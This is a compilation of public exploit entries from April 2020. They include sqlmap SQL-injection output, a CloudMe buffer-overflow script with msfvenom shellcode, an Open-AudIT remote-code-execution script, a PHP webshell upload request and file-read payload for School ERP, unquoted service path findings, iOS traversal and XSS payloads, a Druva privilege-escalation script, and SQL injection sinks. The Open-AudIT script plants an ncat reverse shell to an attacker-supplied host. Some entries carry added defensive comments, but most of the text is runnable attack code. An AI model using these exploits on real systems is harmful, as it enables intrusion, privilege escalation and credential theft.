Parameter: es_messagesid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
6369=6369
Type: UNION query
Title: Generic UNION query (random number) - 12 columns
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
SELECT
6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
-
---
[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
# Buffer overflow PoC against the CloudMe client's TCP listener on port 8888.
# A 1500-byte message overruns a fixed buffer: judging by the EIP overwrite and
# the ESP-relative gadget it is a stack-based overflow in which the saved return
# address is replaced with a PUSH ESP / RET gadget (per the EIP comment), so
# execution lands in the NOP sled and the calc.exe payload that follows.
# Defensive notes: the fixed gadget address implies a module loaded without
# ASLR (presumably the CloudMe binary or a bundled DLL; confirm).  The fix is
# bounds-checked parsing in the service, plus building with stack cookies and
# ASLR/DEP-compatible flags; if the service listens beyond loopback, firewall
# port 8888.  Oversized (~1500-byte) messages to that port are a detection
# indicator.
import socket
target = "127.0.0.1"
# Offset to the saved return address: 1052 bytes of filler.
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
# Encoded shellcode; \x00, \x0A and \x0D were excluded per the msfvenom line.
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
# Pads the message to exactly 1500 bytes; the operand order here differs from
# `buf` below but the total length is the same.
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
# NOTE: `sys` is not imported in this script and `sys.exc_value` is a
# Python 2 attribute, so this handler raises NameError instead of printing `e`.
print(sys.exc_value)
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
# Exploit script for CVE-2020-8813 (per the header): an authenticated user
# stores a shell command in an Open-AudIT configuration value which is
# presumably interpolated into a command line when a discovery is executed.
# Defensive notes: configuration values must be treated as data, validated
# against an allowlist, and external tools invoked with an argv array rather
# than a shell string.  Configuration values containing ';' or '${IFS}' (see
# inject_payload below) and unexpected outbound connections from the Open-AudIT
# host are detection indicators.
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup  # third-party; html5lib is also needed by start_discovery
from urllib.parse import quote  # imported but not used below
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
# Positional arguments: base URL, credentials, and the ip/port that are placed
# into the injected command.
if len(sys.argv) != 6:
print("[~] Usage : ./openaudit-exploit.py url username password ip port")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
# One session object so the login cookie is reused by every later request.
request = requests.session()
def inject_payload():
# PATCHes configuration item 90 with a value that is a shell fragment: the
# leading ';' terminates whatever the value is appended to, and ${IFS} is used
# in place of literal spaces.  The server stores it as-is; nothing runs until
# start_discovery() executes a discovery.
# Fix (server side): reject shell metacharacters in this setting and never
# pass it through a shell.
configuration_path = url+"/en/omk/open-audit/configuration/90"
data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
request.patch(configuration_path, data)
print("[+] Payload injected in settings")
def start_discovery():
# Creates a subnet discovery and immediately requests its /execute URL;
# executing the discovery is what makes the stored configuration value
# (and, per the advisory, the embedded command) get used.
discovery_path = url+"/en/omk/open-audit/discoveries/create"
post_discovery_path = url+"/en/omk/open-audit/discoveries"
# Random 10-letter name so repeated runs do not collide.
scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
req = request.get(discovery_path)
response = req.text
soup = BeautifulSoup(response, "html5lib")
# The access token is taken positionally (6th <input> on the create page);
# this is brittle and breaks if the form layout changes.
token = soup.findAll('input')[5].get("value")
buttons = soup.findAll("button")  # unused
headers = {"Referer" : discovery_path}
# Form fields for the discovery; data[access_token] carries the token scraped
# above, the rest appear to be default values from the create form.
request_data = {
"data[attributes][name]":scan_name,
"data[attributes][other][subnet]":"10.10.10.1/24",
"data[attributes][other][ad_server]":"",
"data[attributes][other][ad_domain]":"",
"submit":"",
"data[type]":"discoveries",
"data[access_token]":token,
"data[attributes][complete]":"y",
"data[attributes][org_id]":"1",
"data[attributes][type]":"subnet",
"data[attributes][devices_assigned_to_org]":"",
"data[attributes][devices_assigned_to_location]":"",
"data[attributes][other][nmap][discovery_scan_option_id]":"1",
"data[attributes][other][nmap][ping]":"y",
"data[attributes][other][nmap][service_version]":"n",
"data[attributes][other][nmap][open|filtered]":"n",
"data[attributes][other][nmap][filtered]":"n",
"data[attributes][other][nmap][timing]":"4",
"data[attributes][other][nmap][nmap_tcp_ports]":"0",
"data[attributes][other][nmap][nmap_udp_ports]":"0",
"data[attributes][other][nmap][tcp_ports]":"22,135,62078",
"data[attributes][other][nmap][udp_ports]":"161",
"data[attributes][other][nmap][timeout]":"",
"data[attributes][other][nmap][exclude_tcp_ports]":"",
"data[attributes][other][nmap][exclude_udp_ports]":"",
"data[attributes][other][nmap][exclude_ip]":"",
"data[attributes][other][nmap][ssh_ports]":"22",
"data[attributes][other][match][match_dbus]":"",
"data[attributes][other][match][match_fqdn]":"",
"data[attributes][other][match][match_dns_fqdn]":"",
"data[attributes][other][match][match_dns_hostname]":"",
"data[attributes][other][match][match_hostname]":"",
"data[attributes][other][match][match_hostname_dbus]":"",
"data[attributes][other][match][match_hostname_serial]":"",
"data[attributes][other][match][match_hostname_uuid]":"",
"data[attributes][other][match][match_ip]":"",
"data[attributes][other][match][match_ip_no_data]":"",
"data[attributes][other][match][match_mac]":"",
"data[attributes][other][match][match_mac_vmware]":"",
"data[attributes][other][match][match_serial]":"",
"data[attributes][other][match][match_serial_type]":"",
"data[attributes][other][match][match_sysname]":"",
"data[attributes][other][match][match_sysname_serial]":"",
"data[attributes][other][match][match_uuid]":""
}
print("[+] Creating discovery ..")
# allow_redirects=False so the redirect's Location header (the new discovery's
# URL) can be read and turned into the /execute URL.
req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
disocvery_url = url + req.headers['Location'] + "/execute"
print("[+] Triggering payload ..")
print("[+] Check your nc ;)")
request.get(disocvery_url)
def login():
# Posts the credentials on the shared session and reports success unless the
# application's known error string appears in the response body.
login_info = {
"redirect_url": "/en/omk/open-audit",
"username": username,
"password": password
}
login_request = request.post(url+"/en/omk/open-audit/login", login_info)
login_text = login_request.text
if "There was an error authenticating" in login_text:
return False
else:
return True
# Entry point: authenticate, store the configuration value, then trigger it.
if login():
print("[+] LoggedIn Successfully")
inject_payload()
start_discovery()
else:
print("[-] Cannot login!")
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
Description
-------------------------------------------
A student can send a message to the admin. Additionally, with this method,
the student can upload a PHP file to the system and run code in the system.
------------------------------------
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
- Student user can send message to admin with the attachment
------------------------------------
// Attachment handling for a student-to-admin message (fragment; $i, $id and
// $db come from the surrounding loop/scope).  $image_file is assigned but not
// used in this excerpt.
$image_file = basename($_FILES['newimage']['name'][$i]);
// The extension is derived from the client-supplied filename and never checked
// against an allowlist, so "shell.php" keeps its .php extension.
$ext=explode(".",$_FILES['newimage']['name'][$i]);
$str=date("mdY_hms");
//$t=rand(1, 15);
// $t is commented out above, so it is undefined here unless set elsewhere;
// the stored name is then "<name><timestamp>.<ext>".
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
// Files land in a web-served directory, so a stored .php file can be requested
// and executed by the web server (the PoC above uploads one).
$updir = "images/messagedoc/";
$dest_path = $updir.$new_thumbname;
$up_images[$i] = $dest_path;
$srcfile = $_FILES['newimage']['tmp_name'][$i];
// '@' suppresses move failures, so errors are silently ignored.
// Fix: validate the extension and MIME type against an allowlist (finfo),
// generate a server-side random name, and store outside the web root or in a
// directory where script execution is disabled.
@move_uploaded_file($srcfile, $dest_path);
$ins_arr_prod_images = array(
'`es_messagesid`' => $id,
'`message_doc`' => $new_thumbname
);
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);
---------------------------------------------------
*PoC of the Remote Code Execution*
---------------------------------------------------
POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
Content-Type: multipart/form-data;
boundary=---------------------------2104557667975595321153031663
Content-Length: 718
DNT: 1
Connection: close
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
Upgrade-Insecure-Requests: 1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="subject"
DEDED
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="message"
<p>DEDED</p>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
Content-Type: text/php
<?php phpinfo(); ?>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="filecount[]"
1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="submit_staff"
Send
-----------------------------2104557667975595321153031663--
------------------------------------
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
- Admin user can update user profile photo
------------------------------------
// Profile photo upload (admin area); the if block continues past this excerpt.
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
// Splitting on '.' and keeping only [0] and [1] means "shell.php.png" yields
// ext[0]="shell", ext[1]="php": the trailing .png is dropped and the stored
// name ends in .php (see "Bypass Technique" below).
$ext = explode(".",$_FILES['pre_image']['name']);
$str = date("mdY_hms");
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
// Stored under a web-served path with the unvalidated extension.
// Fix: take the last extension (pathinfo) and compare it to an image
// allowlist, verify the content (getimagesize/finfo), and write a
// server-generated name; re-encoding the image is safer still.
$updir = "images/student_photos/";
$uppath = $updir.$new_thumbname;
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
$file = $new_thumbname;
------------------------------------
Bypass Technique:
------------------------------------
$_FILES['pre_image']['name']; --- > shell.php.png
$ext = explode(".",$_FILES['pre_image']['name']);
---
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$ext[0] --> shell
$ext[1] --> php
lastfilename --> st_date_shell.php
# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-27
# Vendor Homepage: https://www.nvidia.com/es-la/
# Software Link : https://www.nvidia.com/es-la/
# Tested Version: 1.0.21
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto
C:\>sc qc nvUpdatusService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: nvUpdatusService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START (DELAYED)
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: .\UpdatusUser
C:\>
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Title: Easy Transfer 1.7 for iOS - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-27
# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078
# CVE: N/A
Document Title:
===============
Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2223
Common Vulnerability Scoring System:
====================================
7.1
Affected Product(s):
====================
Rubikon Teknoloji
Product: Easy Transfer v1.7 - iOS Mobile Web-Application
(Copy of the Homepage:
https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )
Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
1.1
A directory traversal web vulnerability has been discovered in the Easy
Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.
The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local path variables of the web-server
by changing the local path in the performed request itself.
In a first request the attacker changes the path, and the host redirects to
complete the address with "..". The attacker then appends "/.." and a final
slash to the request, after which the path can be accessed via a web browser
to download or list local files.
Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.
1.2
Multiple persistent cross site scripting vulnerabilities have been
discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The persistent vulnerabilities are located in the `Create Folder` and
`Move/Edit` functions. Attackers are able to inject own malicious
script codes to the `oldPath`, `newPath` and `path` parameters. The
request method to inject is POST and the attack vector is located on
the application-side.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Create Folder
[+] Move/Edit
Vulnerable Parameter(s):
[+] oldPath
[+] newPath
[+] path
Proof of Concept (PoC):
=======================
1.1
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Exploitation
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]
--- PoC Session Logs [GET] --- (list)
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 213
Content-Type: application/json
Connection: Close
1.2
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Exploitation
<scriptx00>alert(document.domain)</script>
--- PoC Session Logs [POST] --- (Create & Move)
http://localhost/create
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
path=/test<scriptx00>alert(document.domain)</script>
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2
Content-Type: application/json
Connection: Close
-
http://localhost/move
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script>
-
POST: HTTP/1.1 200 OK
Content-Length: 411
Content-Type: text/html; charset=utf-8
Connection: Close
- [GET] (Execution)
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: http://localhost/
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
# CVE: N/A
Vulnerable code: (/student_staff/download.php)
- File Name: download.php
- Content of the download.php
<?php
// Arbitrary file read: $_REQUEST['document'] (GET, POST and, depending on
// request_order, cookie data) is used as a filesystem path with no validation,
// so "../" sequences reach any file the web server process can read; the
// payload below fetches includes/constants.inc.php, which holds the database
// credentials.
// Fix: never accept a path from the client.  Look the document up by id in the
// database, or resolve the name under a fixed directory with realpath() and
// refuse it unless the result lies inside that directory.  The value is also
// echoed unescaped into Content-Disposition; use basename() and escape it.
if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
$file = $_REQUEST['document'];
header("Content-type: application/force-download");
header("Content-Transfer-Encoding: Binary");
// filesize() and readfile() both operate on the raw client-supplied path.
header("Content-length: ".filesize($file));
header("Content-disposition: attachment; filename=\"".$file."\"");
readfile($file);
exit;
}
?>
------------
*Payload:*
---------------
http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
------------------------
*After running the payload: (we accessed the file content)*
------------------------
<?php
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'aroxi********');
define('DB_SERVER_PASSWORD', 'erp**********');
define('DB_DATABASE', 'aroxi****************');
?>
# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-28
# Vendor Homepage: https://andreaelectronics.com/
# Software Link : https://andreaelectronics.com/
# Tested Version: 1.0.64.7
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
C:\>sc qc AESTFilters
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
# Because the binary path above is unquoted and contains spaces, the Service Control Manager may try
# C:\Program.exe, C:\Program Files\IDT.exe and C:\Program Files\IDT\WDM.exe before reaching
# C:\Program Files\IDT\WDM\AESTSr64.exe. A successful attempt therefore requires the local user to be able
# to write an executable into C:\, C:\Program Files or C:\Program Files\IDT undetected by the OS or other
# security applications. On a default Windows 10 installation those directories are not writable by
# standard users, so exploitability depends on weakened ACLs. Since the service is AUTO_START and runs as
# LocalSystem (see the sc qc output above), a planted binary would execute with SYSTEM privileges at the
# next service start or reboot.
# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
# Date: 2020-04-28
# Exploit Author: Chris Lyne
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
# Version: 6.5.2
# Tested on: Windows 10
# CVE : CVE-2019-3999
# See also: https://www.tenable.com/security/research/tra-2020-12
import socket
import struct
import sys
# Command injection in inSyncCPHwnet64 RPC service
# Runs as nt authority\system. so we have a local privilege escalation
# The single positional argument is the command line to execute; print usage
# and stop if it is missing.
if len(sys.argv) < 2:
    print "Usage: %s <quoted command to execute>" % __file__
    print "E.g. %s \"net user /add tenable\"" % __file__
    sys.exit(0)

# Target the RPC service on the local host (port value taken from the advisory).
ip = '127.0.0.1'
port = 6064
command_line = sys.argv[1]
# command gets passed to CreateProcessW
def make_wide(str):
    """Return the input with a NUL byte appended after every character.

    This produces the UTF-16LE-style "wide" string the service hands to
    CreateProcessW. It is only correct for single-byte (ASCII) input, exactly
    like the original implementation; multi-byte characters are not handled.
    """
    return ''.join(ch + '\x00' for ch in str)
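# Protocol prologue and opcode for the inSyncCPHwnet64 RPC service, as
# documented in the advisory (TRA-2020-12).
hello = "inSync PHC RPCW[v0002]"
func_num = "\x05\x00\x00\x00"  # 05 is to run a command
command_line = make_wide(command_line)
# Little-endian int32 giving the byte length of the wide string that follows.
command_length = struct.pack('<i', len(command_line))

# send each request separately (kept as in the original PoC)
requests = [hello, func_num, command_length, command_line]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((ip, port))
    for i, req in enumerate(requests, 1):
        print 'Sending request' + str(i)
        # sendall() loops until every byte is written; a bare send() may write
        # only a prefix, which would silently corrupt the opcode/length/command
        # framing the service expects.
        sock.sendall(req)
finally:
    # Release the socket on every path, including a refused connection.
    sock.close()
print "Done."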
# Exploit Title: hits script 1.0 - 'item_name' SQL Injection
# Date: 2020-04-27
# Exploit Author: SajjadBnd
# Vendor Homepage: https://hits.ir
# Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip
# Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip
# Version: 1.0
# Tested on: Win10 Professional x64
[ description of script ]
With this script you can set up a site to exchange statistics and traffic as well as
increase rankings. In this script, it is possible to exchange Google +1,
exchange Facebook points, exchange Twitter followers,
exchange YouTube visitors, exchange visit statistics.
[ poc ]
file : ipn.php
parameters : 'item_name' , 'item_number'
method : POST
note : every ipn.php sink listed below sits behind the line-35 check
       `if(strcmp($res, "VERIFIED") == 0)`, i.e. the response to what appears to be the
       PayPal IPN post-back must be VERIFIED before the tainted query runs; the register.php
       sink (PlusREF cookie, line 22) has no such precondition beyond a registration POST.
source [
36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'"));
19: $item_name = $_POST['item_name'];
20: $item_number = $_POST['item_number'];
requires:
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
31: if(!$fp) else
35: if(strcmp($res, "VERIFIED") == 0)
]
parameter : 'custom'
method : POST
source [
43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'");
27: $custom = $_POST['custom'];
requires:
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
31: if(!$fp) else
35: if(strcmp($res, "VERIFIED") == 0)
41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
]
parameters : 'item_name','mc_gross'
method : POST
source [
44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())");
19: $item_name = $_POST['item_name'];
22: $payment_amount = $_POST['mc_gross'];
requires:
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
31: if(!$fp) else
35: if(strcmp($res, "VERIFIED") == 0)
41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
]
file : register.php
parameters : 'PlusREF','register'
method : COOKIE,POST
source [
22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'");
21: $ref = $_COOKIE['PlusREF'];
requires:
3: if(isset($_POST['register']))
19: if(!checkpwd ($sec['password'], $sec['password2'])) else
20: if(isset($_COOKIE['PlusREF']))
]
&
source [
40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or
37: $final = visitorip ();
39: $passc = md5($passa);
38: $passa = $sec['password'];
38: $passa = $sec['password'];
21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)),
26: $activare = rand(000000000, 999999909);
requires:
3: if(isset($_POST['register']))
19: if(!checkpwd ($sec['password'], $sec['password2'])) else
]
# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
# Author: Vulnerability Laboratory
# Date: 2020-04-28
# Vendor: https://www.internetdownloadmanager.com
# Software: https://www.internetdownloadmanager.com/download.html
# CVE: N/A
Document Title:
===============
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2236
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Disclosure Timeline:
==================================
2020-04-28: Public Disclosure (Vulnerability Laboratory)
(Copy of the Homepage:
https://www.internetdownloadmanager.com/support/about_us.html )
(Software Product: https://www.internetdownloadmanager.com/download.html)
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple stack buffer overflow vulnerabilities have been discovered in
the official Internet Download Manager v6.37.11.1 software.
The buffer overflow lets a local attacker overwrite saved registers and the
SEH handler pointer of the IDM process (the debug log below shows EAX/EDX and
the SE handler at 0168D8F0 set to 41414141). The advisory's claim that this
compromises the file system or elevates local privileges is not demonstrated
by the PoC, which shows only a crash under attacker-controlled register values.
1.1
The first stack buffer overflow is located in the `search` function of
the downloads menu. The search function itself does not use
any secure restriction in the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. Thus allows a local
attacker to compromise the local computer- or file-system.
1.2
The second stack buffer overflow is located in the `Export/Import`
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.
The security risk of the local stack buffer overflow vulnerabilities in
the software is estimated as high with a CVSS score of 7.1.
